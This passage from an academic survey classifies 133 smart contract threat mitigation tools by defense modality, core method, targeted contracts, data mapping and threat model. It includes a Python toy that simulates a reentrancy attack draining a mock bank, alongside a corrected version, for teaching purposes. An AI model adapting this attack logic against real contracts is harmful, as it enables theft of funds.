methodology employed in this survey (Section 4.3). After that, we classify 133 threat mitigation
solutions based on the developed five-dimensional taxonomy (Section 4.4), followed by a detailed
comparative description of designs of the eight core methods of threat mitigation (Section 4.5).
Next, we compare the threat mitigation methods by their ability to address specific known smart
contract vulnerabilities (Section 4.6). Then, we discuss trends and future perspectives of threat
mitigation in smart contracts (Section 4.7), and finally, we conclude our work (Section 4.8).
4.2: Prior Surveys
A number of previous surveys on smart contract security have been published; however, their
perspectives differ from that of this survey. Atzei et al. [57] propose the first systematic
exposition of the Ethereum security vulnerabilities by organizing the vulnerabilities in three levels:
Solidity³⁴, EVM³⁵ bytecode, and blockchain. They also illustrate six influential attacks in different
application scenarios. In contrast, we primarily target vulnerability mitigation methods rather than
the classification of programming pitfalls. Jiachi et al. [92] propose an empirical survey that
provides a systematic study of smart contract defects on the Ethereum platform from five aspects:
security, availability, performance, maintainability, and re-usability. They collect and analyze
smart contract-related posts on Ethereum.StackExchange³⁶ as well as real-world smart contracts to
define 20 kinds of contract flaws and 5 relevant impacts. Zou et al. [311] perform exploratory
research to illustrate the current state and potential challenges in smart contract development.
Specifically, they conduct semi-structured interviews with 20 developers and professionals, followed
by a survey of 232 practitioners to confirm the 5 conclusions from the interviews that focus
primarily on smart contract development. In addition, Zhang et al. [302] present a new classification
framework for smart contract bugs and construct a dataset of 176 buggy smart contracts. Wang et
al. [284] conduct an analysis of the security of Ethereum smart contracts and categorize these
security challenges into abnormal contracts, program vulnerabilities, and unsafe external data. Vacca
et al. [272] provide a systematic review of techniques and tools used to address the software
engineering-specific challenges of blockchain-based applications by analyzing 96 papers. The above
surveys summarize smart contract security and development issues, while we focus on vulnerability
mitigation solutions.
   ³⁴ Solidity is an object-oriented programming language used mostly for writing Ethereum smart contracts.
   ³⁵ The Ethereum Virtual Machine (EVM) is a software platform for executing Ethereum smart contracts. All smart
contracts are compiled into bytecode and run on the EVM of all Ethereum nodes.
   ³⁶ https://ethereum.stackexchange.com/
      There are also a number of surveys that take the vulnerability mitigation solutions into
consideration. Huashan et al. [91] present a comprehensive and systematic survey on Ethereum systems
security, which includes vulnerabilities, attacks, and defenses. The authors discuss 44 kinds of
vulnerabilities based on the layers of the Ethereum architecture and describe the history, cause,
tactic, and direct impact of 26 attacks. As for defenses, the authors enumerate 47 defense mechanisms
and provide the best practices to guide contract development. Although they divide the defenses
into proactive and reactive, they do not explain how the different tools are designed.
Another survey by Wang and He et al. [282] reviews 6 kinds of vulnerability detection methods
and privacy protection techniques in 3 platforms (i.e., Ethereum, Hyperledger Fabric, and Corda),
and summarizes several commonly used tools for each method. Di Angelo et al. [107] investi-
gate 27 analysis tools of Ethereum smart contracts regarding availability, maturity level, methods
employed, and detection of security issues. They examine the availability and functionality of
the tools and compare their characteristics in a structured manner. In comparison, we carry out a
multi-dimensional classification of 133 solutions and take into account different aspects of threat
mitigation. Besides, we also analyze different defense mechanisms through their architecture. Fur-
thermore, Samreen et al. [245] review some detection tools and discuss eight vulnerabilities by
analyzing past exploitation cases. Ni et al. [222] propose a three-layered threat model for smart
contract security and introduce 15 major vulnerabilities of Ethereum at three levels: programming
language, virtual machine, and blockchain. They also summarize and compare the three most com-
monly used vulnerability mitigation techniques, viz., fuzzing, symbolic execution, and formal ver-
ification. Li et al. [185] survey the security threats of blockchain and enumerate 6 real attack cases.
They also review the security enhancement solutions for blockchain by introducing 5 commonly
used defense tools. In contrast, we categorize defenses in 5 orthogonal dimensions and compare
133 commonly used solutions. Praitheeshan et al. [233] review the security of Ethereum smart
contracts through 16 types of security vulnerabilities, 19 software security issues, and 3 defense
methods. For each defense method, they list several common tools but do not compare the different
methods and tools. In contrast, we cover five more core methods of threat mitigation and compare
them through 5 dimensions. Moreover, we also construct a compact vulnerability map that contains
37 known vulnerabilities to summarize the vulnerability-addressing ability of 38 classes of threat
mitigation solutions.
    There are several studies that delve into a specific defense method (e.g., formal verification).
Tolmach et al. [268] scrutinize formal models and specifications of smart contracts. They categorize
the specifications of smart contracts in various application domains and propose a four-layered
framework to classify smart contract analysis methods. After that, they summarize the tools for
formal verification and group them based on the utilized techniques. In addition, the authors also
discuss the difficulties in smart contract verification and development. Similarly, Singh et al. [258]
conduct a systematic survey about current formalization research on all smart contract-enabled
blockchain platforms by summarizing 35 studies between 2015 and 2019. However, these studies
focus purely on formal verification without examining other types of threat mitigation. In
contrast, we cover eight commonly used core methods of vulnerability mitigation and identify future
research trends and directions in smart contract threat mitigation.
    Unlike the above surveys, which have insufficient technical depth or only focus on a specific
method, our survey comprehensively reviews the topic of eight commonly used core methods.
Overall, we undertake four major steps to shed light on the ever-evolving threat mitigation land-
scape of smart contracts: 1) comprehensive 5-dimensional classification taxonomy; 2) synthesis
of design workflows corresponding to the eight core methods; 3) vulnerability coverage map; and
4) evolutionary analysis with trends and perspectives. The combination of these four steps applied
to 133 solutions makes our work the most comprehensive systematization of smart contract threat
mitigation to date.
4.3: Methodology
In this section, we describe the details of the 4-step methodology that we use in this survey. Fig. 4.1
depicts these steps, which include: Step I: developing the classification taxonomy of smart con-
tract threat mitigation solutions; Step II: synthesizing the workflows of the core methods of threat
mitigation solutions; Step III: developing the vulnerability coverage map by threat mitigation so-
lutions; and Step IV: investigating the evolutionary trends and deficiencies of threat mitigation in
smart contracts. Next, we describe the approaches employed by these four steps in detail.
                           Figure 4.1: Four-step methodology of this survey.
4.3.1: Classification Taxonomy
To classify the smart contract threat mitigation solutions, we build a comprehensive taxonomy of
threat mitigation, which includes the following five orthogonal dimensions (see Table 4.1): 1)
defense modality, 2) core method, 3) targeted contracts, 4) data mapping, and 5) threat model. We
empirically verify that our taxonomy is not only concise but also describes a threat mitigation
solution with high accuracy. For example, using our taxonomy, the popular threat mitigation
tool Oyente [200] can be accurately described via the following single sentence:
       “Oyente is a security tool based on symbolic execution that detects and reports
       vulnerabilities in the bytecode of malicious or buggy Ethereum smart contracts.”
    Moreover, our taxonomy is cross-platform and general enough to be applied to the future
developments of threat mitigation for smart contracts, even when new methods or platforms emerge.
Next, we describe all five dimensions of the threat mitigation taxonomy in detail.
Defense Modality: The defense modality is the essential philosophy used by a threat mitigation
solution to achieve its goals, which is either prevention, detection, or exploration. The prevention
methods aim at verifying or enforcing certain security properties of a smart contract. For exam-
ple, the requirement that if a smart contract accepts cryptocurrency deposits, it must also provide
the functionality for cryptocurrency withdrawal, can be used by a solution with the prevention
modality as a property to enforce or verify security. The detection methods look for known vul-
nerabilities in smart contracts. For instance, defense tools that search for reentrancy vulnerabilities
in smart contracts pertain to the detection defense modality. The exploration approaches enhance
the transparency of a smart contract or associated transactions in order to facilitate security audits.
For example, an auditing tool that allows demystifying the call stack of a complicated smart
contract, thereby exposing the potential security problems, would belong to the exploration defense
modality.
                       Table 4.1: Smart contract threat mitigation taxonomy
  Classification Dimension    Possible Values                        Short Notation
  Defense Modality            prevention                             PR
                              detection                              DET
                              exploration                            EXP
  Core Method                 static analysis                        SA
                              symbolic execution                     SE
                              fuzzing                                F
                              formal analysis                        FA
                              machine learning                       ML
                              execution tracing                      ET
                              code synthesis                         CS
                              transaction interception               TI
  Targeted Contracts          Ethereum                               ETH
                              EVM-compatible                         EVMc
                              any contract                           aC
                              non-Ethereum                           nETH
  Data Mapping                Input: source code                     S
                              Input: bytecode                        B
                              Input: ABI                             A
                              Input: specifications                  Sp
                              Input: chain data                      C
                              Input: assembly code                   As
                              Output: report                         R
                              Output: source code                    S
                              Output: bytecode                       B
                              Output: action                         Ac
                              Output: exploits                       E
                              Output: metadata                       M
  Threat Model                vulnerable contract only               VC
                              malicious contract only                MC
                              malicious or vulnerable contract       MVC
Core Method: The core method is the technical approach describing the implementation princi-
ples of a given threat mitigation solution. Unlike defense modality, which describes the general
philosophy of a solution, the core method describes the implementation methodology utilized by
the solution; in other words, the same defense philosophy can be implemented in a number of
different core methods. Threat mitigation solutions belonging to the same core method, despite the
diversity of implementations, share the same major workflow with possible minor additions. For
example, all symbolic execution methods take a smart contract and a set of specifications as
input, utilize an SMT solver, and produce a human-readable report as output; however, many
symbolic execution solutions add extra modules and data units to the standard workflow items. In
this work, we build workflows that demonstrate which items are essential and which of them provide
an incremental augmentation.
       Figure 4.2: Venn diagram of relationships between different scopes of smart contracts.
Targeted Contracts: The dimension of targeted contracts describes the class of smart contracts
that a threat mitigation solution applies to. This dimension is largely shaped by the practical circum-
stance, in which the vast majority of smart contract threat mitigation solutions target the popular
Ethereum platform. Moreover, we notice that within the Ethereum platform, there is very little
variety in terms of what kind of Ethereum smart contracts the threat mitigation solutions target.
In other words, most solutions target Ethereum, and these Ethereum-based solutions are suitable
for any Ethereum contract. Thus, to accurately represent the practical reality of the distribution of
smart contract threat mitigation solutions in the dimension of targeted contracts, we subdivide this
dimension into four classes: Ethereum smart contracts, EVM-compatible smart contracts, non-
Ethereum smart contracts, and any smart contract (i.e., platform-agnostic). Fig. 4.2 shows the
Venn diagram of the relationships between these classes. Specifically, all Ethereum contracts are
EVM-compatible, but there are non-Ethereum platforms that may or may not be EVM-compatible.
At the same time, the “any contract” scope would embrace all the types of smart contracts men-
tioned above, without prioritizing any of them.
Data Mapping: The data mapping dimension describes what the input and output of a given
threat mitigation solution are. As shown in Table 4.1, the input of a threat mitigation solution
may be a combination of 1) source code; 2) bytecode; 3) application binary interface (ABI); 4)
security specifications; 5) chain data; or 6) assembly code. The output can be represented by any
combination of the following six entities: 1) security report; 2) source code; 3) bytecode; 4) defense
action; 5) set of exploits; or 6) metadata. In this work, we use the symbol ↦ as a convention for
data mapping. For example, if the input of a threat mitigation solution is a set of specifications with
the source code of the smart contract, and the output is a human-readable report, then we denote
such a mapping as Sp,S↦R. As we can see, the data mapping dimension concisely and
informatively describes the requirements for the input and expectations for the output of a smart
contract threat mitigation solution.
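As a small illustration of the notation, the Python sketch below expands a data mapping string into
the input and output entities listed in Table 4.1. The mapping arrow is written as ↦ here, and the
function name `parse_mapping` is a hypothetical helper introduced only for this example.

```python
# Short notations from Table 4.1; "S" and "B" mean the same on both sides.
INPUTS = {"S": "source code", "B": "bytecode", "A": "ABI",
          "Sp": "specifications", "C": "chain data", "As": "assembly code"}
OUTPUTS = {"R": "report", "S": "source code", "B": "bytecode",
           "Ac": "action", "E": "exploits", "M": "metadata"}


def parse_mapping(notation: str):
    """Split 'inputs↦outputs' and expand each short notation."""
    left, right = notation.split("↦")
    inputs = [INPUTS[code.strip()] for code in left.split(",")]
    outputs = [OUTPUTS[code.strip()] for code in right.split(",")]
    return inputs, outputs


print(parse_mapping("Sp,S↦R"))  # (['specifications', 'source code'], ['report'])
```

An unknown short notation raises a `KeyError`, which is a convenient way to catch typos when a large
number of solutions are classified by hand.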
Threat Model: The dimension of threat model describes the vector(s) of potential attacks that the
threat mitigation solution aims to prevent, detect, or explore. We empirically observe that all the
smart contract threat mitigation solutions belong to either of the three general threat models: 1) the
one with the malicious smart contract; 2) the one in which the smart contract is the victim; and 3)
the agnostic model, in which the contract may be either malicious or a victim. For example, the
threat mitigation solutions capable of preventing exploitations of the reentrancy vulnerability, re-
sponsible for the infamous DAO hack [123], belong to the VC (victim contract) model. Conversely,
a tool defending against honeypot smart contracts, which set unexpected traps for hackers attempt-
ing to exploit known smart contract vulnerabilities, is a typical example of a threat mitigation tool
assuming the malicious contract (MC) threat model. However, some solutions defend against vul-
nerabilities that can appear in either a malicious or a victim smart contract; in this case, we assign
to the solution the malicious-or-vulnerable contract (MVC) model. For example, the SWC-123 vul-
nerability [40], called Requirement Violation, can be either a bug in a vulnerable smart contract or
an intentional malicious action of the smart contract developer.
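To make the victim contract (VC) model concrete, the sketch below simulates the reentrancy pattern in plain Python rather than in a contract language. All class and function names are hypothetical; the only assumption carried over from real contracts is that a payout hands control to the recipient before the victim finishes its own bookkeeping.

```python
class VulnerableBank:
    """Toy victim contract: pays out before updating its ledger."""

    def __init__(self):
        self.balances = {}
        self.vault = 0

    def deposit(self, who, amount):
        self.balances[who] = self.balances.get(who, 0) + amount
        self.vault += amount

    def withdraw(self, who, on_receive):
        amount = self.balances.get(who, 0)
        if amount == 0 or self.vault < amount:
            return
        self.vault -= amount
        on_receive(amount)        # external call happens first
        self.balances[who] = 0    # ledger update happens too late


class SaferBank(VulnerableBank):
    """Same contract with the ledger update moved before the external call."""

    def withdraw(self, who, on_receive):
        amount = self.balances.get(who, 0)
        if amount == 0 or self.vault < amount:
            return
        self.balances[who] = 0    # effect first
        self.vault -= amount
        on_receive(amount)        # interaction last


class Attacker:
    """Re-enters withdraw() from its receive callback a bounded number of times."""

    def __init__(self, bank, max_reentries):
        self.bank = bank
        self.max_reentries = max_reentries
        self.reentries = 0
        self.loot = 0

    def receive(self, amount):
        self.loot += amount
        if self.reentries < self.max_reentries:
            self.reentries += 1
            self.bank.withdraw("attacker", self.receive)


def run(bank_cls, max_reentries=4):
    bank = bank_cls()
    bank.deposit("alice", 90)
    bank.deposit("attacker", 10)
    thief = Attacker(bank, max_reentries)
    bank.withdraw("attacker", thief.receive)
    return thief.loot, bank.vault


print(run(VulnerableBank))  # attacker drains more than the 10 units deposited
print(run(SaferBank))       # attacker receives only the 10 units deposited
```

In this toy setting the contract is the victim and the caller is the adversary, which is exactly the situation the VC model assumes.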
4.3.2: Workflows of Core Methods
In this survey, not only do we explore what the smart contract threat mitigation solutions do, but we
also explore, for the first time, how these solutions accomplish their goals. In order to do that, we
adopt the following approach: for each of the eight core methods, we synthesize the workflows of
all the existing solutions implementing these methods to showcase the mandatory (common for all
solutions) and augmented (observed in some solutions) elements. Sections 4.5.1–4.5.8 describe
the synthesized workflows of all the eight core methods of smart contract threat mitigation. In order
to embrace the diverse variety of implementations, we use a uniform set of conventions in the eight
workflows. Specifically, we use three types of elements connected with flows (arrows): modules
(data processors), data entities, and environments (groups).
4.3.3: Vulnerability Coverage
The third step of our survey is scrutinizing the vulnerability coverage, i.e., determining which
known vulnerabilities are detectable and/or preventable by the existing threat mitigation solutions.
To accomplish that, we create a uniform vulnerability coverage map using the popular SWC Reg-
istry. This task poses two major challenges: i) many threat mitigation solutions do not explicitly
or even implicitly declare the set of addressed vulnerabilities; ii) the majority of threat mitigation
solutions refer to the existing vulnerabilities using custom names and/or groupings, which often
do not correspond to the SWC taxonomy. Here, we select the 38 threat mitigation solutions that
explicitly specify the list of targeted vulnerabilities, and then we meticulously translate the declared
vulnerability coverage provided by the selected 38 solutions into the SWC conventions.
4.3.4: Threat Mitigation Evolution
Our final step explores the evolution of the smart contract threat mitigation solutions, as well as
the trends and obstacles observed in this area of computer security. Specifically, we explore the
adoption and augmentation of new core methods over time. For each threat mitigation solution,
we keep track of the publication date as well as the initial release or announcement date, whenever
available. Additionally, we analyze the “blind spots” of the existing body of smart contract mit-
igation solutions — the potentially feasible yet unexplored combinations of approaches that can
bring more benefits, especially if a similar combination of approaches has been successful in other
more mature areas of computer security. As a result, we make five observations supported by data
and evidence. First, we identify that dynamic transaction interception methods of smart contract
threat mitigation are gaining momentum in the research community. Second, we show that the
smart contract threat mitigation solutions utilizing AI and machine learning have started playing
an important role in smart contract defense. Third, we identify an emerging trend of studying
human-machine interaction in the domain of smart contracts. Fourth, we confirm that Ethereum
smart contracts are over-represented among the targets of threat mitigation solutions, and we discuss likely rea-
sons for this phenomenon. Finally, we discuss the necessity for more exploration tools and
large-scale measurements for gathering important data about smart contract security, such as the
real market value of smart contracts and the traces of choices made by miners and crypto exchanges.
4.4: Threat Mitigation Classification
In this section, we apply the taxonomy developed earlier (Section 4.3.1) to describe each of the
threat mitigation solutions via the five orthogonal dimensions: threat mitigation modality (Section
4.4.1), core method (Section 4.4.2), the scope of targeted contracts (Section 4.4.3), the input-output
data mapping of the solution (Section 4.4.4), and the assumed threat model (Section 4.4.5). The
results of our classification are given in Table 4.2. Furthermore, we perform a frequency analysis
of the results along the five dimensions, and create a visual representation of the distributions of
defense modalities, core methods, targeted contracts, and threat models in Fig. 4.3. In the first
column of the table, we assign to each of the threat mitigation solutions a permanent Security
Threat Mitigation (STM) registry identifier in the STM-XXX format. The second column provides
the name of the tool implementing the solution along with its reference; if a solution does not have
a common name, we refer to the solution by its authors (e.g., Ivanov et al.). In columns 3–7, we
provide the values along the five classification dimensions for each of the 133 threat mitigation
Table 4.2: Classification of threat mitigation solutions based on the proposed taxonomy.
                                        Classification Criteria (Dimensions)†
STM       Threat mitigation             Defense   Core    Targeted   Data          Threat
code      solution                      Modality  Method  Contracts  Mapping       Model
STM-001   Oyente [200]                  DET       SE      ETH        B ↦ R         MVC
STM-002   Mythril [215]                 DET       SE      ETH        B ↦ R         MVC
STM-003   Securify [271]                DET+PR    SA      ETH        B,S ↦ R,M     MVC
STM-004   Maian [223]                   DET       SE      ETH        B ↦ R         MVC
STM-005   Manticore [214]               DET       SE      ETH        B ↦ R         MVC
STM-006   KEVM [148]                    EXP       FA      ETH        B ↦ R         MVC
STM-007   ZEUS [168]                    PR        SE      ETH        B ↦ R         MVC
STM-008   Sereum [240]                  DET       ET,TI   ETH        C ↦ R         VC
STM-009   ECFChecker [137]              PR        ET,TI   ETH        C ↦ R         VC
STM-010   teEther [178]                 DET       SE      ETH        B ↦ E         VC
STM-011   Hydra [74]                    PR        CS      ETH        S ↦ B         VC
STM-012   Erays [310]                   EXP       SA      ETH        B ↦ M         MVC
STM-013   TokenScope [96]               DET       ET      ETH        C ↦ R         MVC
STM-014   Osiris [269]                  DET       SE      ETH        B ↦ R         VC
STM-015   Vandal [76]                   DET       SA      ETH        B ↦ R         MVC
STM-016   FSolidM [205]                 PR        CS      ETH        S,Sp ↦ S      VC
STM-017   ContractFuzzer [163]          DET       F       ETH        A,B ↦ R       VC
STM-018   S-GRAM/Ether* [194]           DET       SA      ETH        S ↦ R         MVC
STM-019   MadMax [133]                  DET       SA      ETH        B ↦ R         MVC
STM-020   SmartCheck [267]              DET       SA      ETH        S ↦ R         MVC
STM-021   ReGuard [193]                 DET       F       ETH        S ↦ R,E       VC
STM-022   GASPER [95]                   DET       SA      ETH        B ↦ R         MC
STM-023   Grishchenko et al. [136]      EXP       FA      ETH        B ↦ M         MVC
STM-024   Lolisa [294]                  PR        FA      ETH        S ↦ R         MVC
STM-025   SASC [307]                    EXP       SA      ETH        S ↦ R         MVC
STM-026   Chen et al. [97]              DET       ET,SA   ETH        C,S ↦ R       MC
STM-027   Solidity*/EVM* [64]           PR        SA,FA   ETH        S ↦ R         MVC
STM-028   Amani et al. [52]             PR        SA,FA   ETH        B,Sp ↦ R      MVC
STM-029   Model-Checking [217]          PR        FA      ETH        Sp,S ↦ R      MVC
STM-030   EtherTrust [135]              DET       SA      ETH        B ↦ R         MVC
STM-031   Flint [249]                   PR        CS      ETH        Sp ↦ S        VC
STM-032   HoneyBadger [270]             DET       SA,SE   ETH        B ↦ R         MC
STM-033   ILF [146]                     DET       F,ML    ETH        B,S ↦ R       MVC
STM-034   VeriSolid [206]               PR        FA,CS   ETH        S,Sp ↦ S      VC
STM-035   solc-verify [141]             PR        SA      ETH        S,Sp ↦ R      MVC
STM-036   Slither [114]                 DET       SA      ETH        S ↦ R         MVC
STM-037   sCompile [89]                 DET       SE      ETH        B ↦ R         MVC
STM-038   NPChecker [280]               DET       SA      ETH        B ↦ R         MVC
STM-039   BitML [58]                    PR        SA      nETH       C,Sp ↦ R,E    VC
STM-040   CESC [187]                    DET       SA      ETH        B ↦ R         VC
† DET: detect; PR: prevent; EXP: exploration; SA: static analysis; SE: symbolic execution; F: fuzzing; FA: formal analysis;
ML: machine learning; ET: execution tracing; CS: code synthesis; TI: transaction interception; S: source code; B: bytecode; A: ABI;
Sp: specifications; C: chain data; As: assembly code; R: report; Ac: action; E: exploits; M: metadata; ETH: Ethereum;
nETH: non-Ethereum; EVMc: EVM-compatible; aC: any contract; VC: vulnerable contract; MC: malicious contract; MVC: malicious or vulnerable contract.
Table 4.2 (cont’d)
                                        Classification criteria
STM       Threat mitigation             Defense   Core    Targeted   Data          Threat
code      solution                      Modality  Method  Contracts  Mapping       Model
STM-041   EasyFlow [127]                DET       SA      ETH        C ↦ R         VC
STM-042   Vultron [278]                 DET       CS      ETH        S ↦ R         VC
STM-043   SAFEVM [48]                   PR        SA      ETH        S,B ↦ R       MVC
STM-044   EthRacer [176]                DET       F       ETH        B,C ↦ R       MVC
STM-045   SolidityCheck [301]           DET       SA      ETH        S ↦ R         MVC
STM-046   EVMFuzz [125]                 DET       F       ETH        S ↦ R         MVC
STM-047   EVulHunter [236]              DET       SA      ETH        As ↦ R        VC
STM-048   GasFuzz [202]                 DET       F       ETH        B ↦ R         MVC
STM-049   NeuCheck [198]                DET       SA      ETH        S ↦ R         MVC
STM-050   SolAnalyser [47]              DET       SA      ETH        S ↦ R         MVC
STM-051   SoliAudit [189]               DET       F       ETH        S ↦ R         MVC
STM-052   MPro [304]                    DET       SA,SE   ETH        S ↦ R         MVC
STM-053   Li et al. [186]               PR        FA      ETH        S ↦ R         VC
STM-054   Gastap [49]                   PR        SA      ETH        S,B,As ↦ R    MVC
STM-055   Momeni et al. [212]           DET       ML      ETH        S ↦ M         MVC
STM-056   KSolidity [165]               EXP       FA      ETH        S ↦ M         MVC
STM-057   VerX [230]                    PR        SE,CS   ETH        S ↦ R         MVC
STM-058   VeriSmart [261]               DET       SA      ETH        S ↦ R         MVC
STM-059   TxSpector [299]               EXP       SA,ET   ETH        C ↦ R         MVC
STM-060   Zhou et al. [309]             EXP       SA      ETH        C ↦ R         MVC
STM-061   ETHBMC [122]                  DET       SE      ETH        B ↦ R         MVC
STM-062   SODA [94]                     DET       TI      EVMc       C ↦ R,Ac      VC
STM-063   Ethor [248]                   PR        SA,FA   ETH        B ↦ R         MVC
STM-064   ÆGIS [117]                    DET       TI      ETH        C ↦ R,Ac      VC
STM-065   SafePay [188]                 DET       SE      ETH        S,B ↦ R       VC
STM-066   Solar [116]                   DET       CS,SE   ETH        Sp ↦ R        VC
STM-067   EVMFuzzer [126]               DET       F       EVMc       Sp ↦ R        MVC
STM-068   ModCon [196]                  DET+PR    F       aC         S ↦ R         MVC
STM-069   Harvey [291]                  DET       F       ETH        S ↦ R         MVC
STM-070   Solythesis [183]              PR        CS      ETH        S ↦ S         VC
STM-071   Ethainter [75]                DET       SA      ETH        S ↦ R         MVC
STM-072   sFuzz [221]                   DET       F       ETH        B,A ↦ R       MVC
STM-073   Seraph [295]                  DET       SE      aC         S ↦ R         MVC
STM-074   Clairvoyance [296]            DET       SA      ETH        S ↦ R         VC
STM-075   Artemis [274]                 DET       SE      ETH        B ↦ R         MVC
STM-076   Echidna [134]                 DET       F       ETH        B,Sc ↦ R,M    MVC
STM-077   EShield [293]                 PR        CS      ETH        B ↦ B         VC
STM-078   SMARTSHIELD [305]             DET       CS      ETH        B ↦ B,R       VC
STM-079   ETHPLOIT [303]                DET       F       ETH        S ↦ E         MVC
STM-080   Cecchetti et al. [84]         PR        CS      aC         S ↦ R         VC
STM-081   EthScope [289]                DET       ET      ETH        C ↦ R         MC
STM-082   ContractWard [281]            DET       ML      ETH        S ↦ R,M       MVC
STM-083   RA [100]                      DET       SA,SE   ETH        B ↦ R         VC
STM-084   Camino et al. [80]            DET       SA      ETH        B ↦ R         MC
STM-085   OpenBalthazar [56]            DET       SA      ETH        S ↦ R         MVC
STM-086   sGUARD [220]                  PR        SA,FA   ETH        B ↦ R         VC
STM-087   SmartPulse [263]              PR        SA      ETH        S,Sp ↦ R      MVC
Table 4.2 (cont’d)
                                        Classification criteria
STM       Threat mitigation             Defense   Core    Targeted   Data          Threat
code      solution                      Modality  Method  Contracts  Mapping       Model
STM-088   SeRIF [83]                    DET       FA      aC         S ↦ R         VC
STM-089   EVMPatch [241]                DET       CS      ETH        B,C ↦ B       VC
STM-090   Perez et al. [228]            EXP       ET      ETH        C ↦ R         VC
STM-091   DEFIER [264]                  DET       ET      ETH        C ↦ R         MVC
STM-092   SmarTest [260]                DET       SE,SA   ETH        B ↦ R,E       MVC
STM-093   EOSAFE [147]                  DET       SA      nETH       B ↦ R         MVC
STM-094   Ivanov et al. [158]           PR+DET    SA      ETH        S ↦ R         MC
STM-095   ConFuzzius [119]              DET       F       ETH        B,A ↦ R       MVC
STM-096   Huang et al. [154]            DET       SA      ETH        B ↦ R         VC
STM-097   STC/STV [153]                 PR        SA      ETH        S ↦ R         VC
STM-098   Horus [120]                   DET       ET      ETH        C ↦ R         MVC
STM-099   BlockEye [276]                DET       ET,TI   ETH        C ↦ R         MVC
STM-100   Sailfish [70]                 DET       SE,SA   ETH        B ↦ R         MVC
STM-101   DeFiRanger [290]              DET       SA      ETH        C ↦ R         VC
STM-102   ESCORT [199]                  DET       ML      ETH        B,Sp ↦ R      MVC
STM-103   DefectChecker [93]            DET       SE      ETH        B ↦ R         MVC
STM-104   Hu et al. [152]               DET       SA,ML   ETH        B ↦ R         MVC
STM-105   HFContractFuzzer [108]        DET       F       nETH       S ↦ R         VC
STM-106   Solidifier [54]               PR        FA      ETH        S ↦ R         VC
STM-107   SafelyAdministrated [156]     PR        CS,ML   ETH        S ↦ S         MC
STM-108   EXGEN [166]                   DET       SE      aC         S ↦ R         VC
STM-109   EtherProv [191]               DET       SA      ETH        S ↦ B,M       MVC
STM-110   Abdellatif et al. [44]        PR        FA      aC         C ↦ R         MVC
STM-111   Bai et al. [59]               PR        FA      aC         Sp ↦ R        MVC
STM-112   Bigi et al. [65]              PR        FA      aC         Sp ↦ R        MVC
STM-113   Findel [66]                   PR        CS      aC         Sp ↦ S        VC
STM-114   ContractLarva [112]           PR        CS      ETH        S,Sp ↦ S      MVC
STM-115   Le et al. [182]               PR        FA      aC         S ↦ R         MVC
STM-116   Solicitous [204]              PR        SA      ETH        S ↦ B         MVC
STM-117   VeriSol [283]                 PR        FA      EVMc       S ↦ R         VC
STM-118   SmartCopy [115]               DET       F       ETH        B,A ↦ R       VC
STM-119   WANA [277]                    DET       SE      aC         B ↦ R         MVC
STM-120   E-EVM [224]                   EXP       ET      ETH        C ↦ R         MVC
STM-121   AMEVulDetector [197]          DET       ML      aC         S ↦ R         MVC
STM-122   Javadity [46]                 PR        CS      EVMc       S ↦ S         MVC
STM-123   Alqahtani et al. [51]         PR        SA      aC         S ↦ B         MVC
STM-124   Bartoletti et al. [60]        PR        FA      nETH       S ↦ R         MVC
STM-125   Beckert et al. [61]           PR        FA      nETH       S ↦ R         VC
STM-126   SmartInspect [72]             EXP       SA      ETH        S,C ↦ R       MVC
STM-127   CPN [109]                     EXP       SA      ETH        S,B ↦ R       MVC
STM-128   Hajdu et al. [142]            PR        FA,SA   ETH        S ↦ R         MVC
STM-129   Kongmanee et al. [177]        PR        FA      ETH        Sp ↦ M        MVC
STM-130   EVM* [203]                    PR        TI      ETH        B,C ↦ R,Ac    MVC
STM-131   OpenZeppelin Contracts [33]   PR        CS      ETH        S ↦ S         VC
STM-132   MythX [31]                    DET       many    ETH        B ↦ R         MVC
STM-133   Contract Library [26]         DET+PR    CS      ETH        B ↦ R         MVC
solutions. Furthermore, to keep the data in this table up to date and handy, we deploy the Smart
Contract Threat Mitigation Registry (STM Registry).
Selection Method of the Threat Mitigation Solutions: For this survey, we select 133 threat miti-
gation solutions, encompassing both academic research projects (e.g., Securify [271], Oyente [200])
and commercial non-academic efforts (e.g., OpenZeppelin Contracts [33], MythX [31]). To ensure
the quality of our study, we use the following four criteria for selecting threat mitigation solutions:
   1. Implementation. We select only solutions that are implemented and evaluated, either as a
       proof-of-concept (PoC) prototype or in the form of a final product.
   2. Publication. For academic research projects, we search for the papers published or accepted
       at a reputable peer-reviewed venue.
   3. Impact. We select solutions that deliver specific improvements or other unique qualities
       compared to the state-of-the-art solutions.
   4. Novelty. Not only do we consider the fact of improvement or impact, but we also consider
       the presence of technical novelty, i.e., a specific innovation that leads to the improvement.
    In some cases, we include threat mitigation solutions that do not meet all four of the above criteria,
such as the academic project Vandal [76], which has never been published at a peer-reviewed venue.
We nevertheless include this work in our survey because it is widely adopted and cited.
Lessons Learned: There are more than 200 works that claim to be smart contract threat mitigation solutions.
Yet, our thorough manual examination reveals various problems associated with some of them. For
example, we observe that sometimes two research papers refer to the same implementation (e.g.,
poster or journal extension articles). Manual scrutiny of each work is therefore required. In the end,
we selected 133 instances to represent the body of smart contract threat mitigation solutions.
Figure 4.3: Distribution of threat mitigation methods by four criteria: (a) defense modality, (b) core
method, (c) targeted contracts, and (d) threat model.
4.4.1: Threat Mitigation Modalities
A threat mitigation modality is a philosophy that a smart contract threat mitigation method employs
to address security issues of a smart contract. The threat mitigation solutions that employ the de-
tection modality are designed to identify vulnerabilities in smart contracts. Some of them (e.g.,
Oyente [200], Securify [271], Vandal [76], and Mythril [215]) target several groups of vulnerabil-
ities. Other detection-based threat mitigation solutions focus on specific classes of vulnerabilities,
such as Sereum [240], which detects only reentrancy vulnerabilities (SWC-107 [37]). Another
narrow-focused detection tool is VeriSmart [261], which detects arithmetic bugs only. Overall,
we note that the detection solutions that focus on specific vulnerabilities tend to deliver improved
detection rates compared to the solutions targeting multiple vulnerabilities.
     The solutions belonging to the prevention modality validate some safety properties or rules.
ZEUS [168] provides eight semantic rules that are used as part of an abstract assertion language
for specifying safety properties for ensuring that a smart contract is free of certain vulnerabilities
(e.g., reentrancy, unchecked send, and integer overflow). Another salient representative of the pre-
vention modality is SmartPulse [263], which creates a linear temporal logic (LTL) language, called
SmartLTL, for expressing temporal safety properties in smart contracts and enforcing them with
the SmartPulse verifier.
    The exploration modality solutions do not detect vulnerabilities or enforce safety properties;
instead, they reveal previously concealed data that facilitates human-based or automated auditing
of a smart contract. Erays [310] is a tool for reverse-engineering smart contracts that converts the
bytecode of a smart contract into pseudocode-like metadata. TxSpector [299], another exploration
solution, is a transaction processing framework that identifies executed attacks in smart
contract execution traces.
